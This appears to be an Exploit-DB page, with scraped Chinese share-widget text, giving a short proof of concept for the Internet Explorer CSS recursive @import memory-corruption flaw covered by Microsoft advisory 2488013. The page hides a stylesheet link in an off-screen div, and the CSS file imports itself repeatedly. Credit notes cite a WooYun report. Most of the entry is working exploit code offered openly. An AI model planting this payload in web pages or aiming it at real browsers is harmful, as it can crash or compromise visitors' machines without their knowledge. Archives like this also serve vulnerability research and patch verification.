扫码分享
验证:
体验盒子<code>
<div style="position: absolute; top: -999px;left: -999px;">
<link href="https://www.exploit-db.com/exploits/15708/css.css" rel="stylesheet" type="text/css" />
</code>
<code of css.css>
*{
color:red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");
</code>
Exploit-DB Notes:
* Original credit goes to an unidentified researcher using WooYun anonymous account "路人甲".
WooYun is a connection platform for vendors and security researchers:
http://www.wooyun.org/bugs/wooyun-2010-0885
* Dec 22, 2010 - Microsoft releases security advisory for this vulnerability:
http://www.microsoft.com/technet/security/advisory/2488013.mspx
体验盒子
